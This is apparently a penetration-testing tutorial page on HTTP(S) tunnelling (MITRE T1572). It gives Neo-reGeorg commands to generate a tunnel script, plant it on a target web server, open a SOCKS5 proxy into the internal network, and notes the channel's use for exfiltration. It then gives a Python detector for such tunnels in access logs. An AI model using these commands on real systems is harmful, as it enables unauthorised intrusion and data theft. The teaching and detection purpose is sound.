HTTP(s) Tunneling

MITRE ATT&CK™ Protocol Tunneling - Technique T1572

Theory

HTTP tunneling is a technique that involves encapsulating non-HTTP traffic within HTTP to traverse network restrictions or security measures. It allows data to be transmitted in a way that appears as regular HTTP traffic, making it more likely to pass through firewalls and other filtering mechanisms that may be in place. It's a valuable pivoting technique to consider.

HTTP(S) Tunneling may also be used as an exfiltration channel.

Practice

We will be using Neo-reGeorg to achieve tunneling. On our attacking machine, we run:

v4resk@kali$ python3 neoreg.py generate -k 'P@ssw0rd!'

Then, we have to upload the generated files to the target machine and host them on a web server. On the attacking machine, we can then run:

# Establish a SOCKS5 proxy
v4resk@kali$ python3 neoreg.py -k 'P@ssw0rd!' -u http://MACHINE_IP/uploader/files/tunnel.php

# We can now use it as a SOCKS5 proxy
v4resk@kali$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
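
On the web server, a tunnel like the one above typically shows up in the access log as a sustained burst of POST requests from one client to a single script. The following detection sketch is an added example, not code from this page or from the Neo-reGeorg project; it assumes Combined Log Format, and the function names, thresholds and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumption: access log in Apache/nginx Combined Log Format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*"')
SCRIPT_EXT = (".php", ".jsp", ".jspx", ".aspx", ".ashx")  # server-side scripts
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_tunnel_candidates(lines, window=timedelta(seconds=60), min_posts=20):
    """Return sorted (client, path, peak) tuples where one client sent at least
    min_posts POSTs to one script within `window`. Thresholds are assumptions."""
    posts = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        ip, ts, method, url = m.groups()
        path = url.split("?", 1)[0]  # ignore the query string when grouping
        if method == "POST" and path.lower().endswith(SCRIPT_EXT):
            posts[(ip, path)].append(datetime.strptime(ts, TS_FMT))
    hits = []
    for (ip, path), stamps in posts.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_posts:
            hits.append((ip, path, peak))
    return sorted(hits)

def sample_log():
    """Constructed sample: one tunnel-like client and two benign ones."""
    t0 = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)
    def row(ip, offset, method, path):
        ts = (t0 + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "-"'
    rows = [row("203.0.113.7", i, "POST", "/uploader/files/tunnel.php") for i in range(30)]
    rows += [row("198.51.100.30", 60 * i, "POST", "/api/search.php") for i in range(25)]
    rows += [row("198.51.100.20", 5, "GET", "/index.php"), "garbage line"]
    return rows

if __name__ == "__main__":
    for ip, path, peak in find_tunnel_candidates(sample_log()):
        print(f"{ip} sent {peak} POSTs within 60s to {path}")
```

Script paths under upload directories deserve a lower threshold, since legitimate applications rarely execute code from there.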

Resources
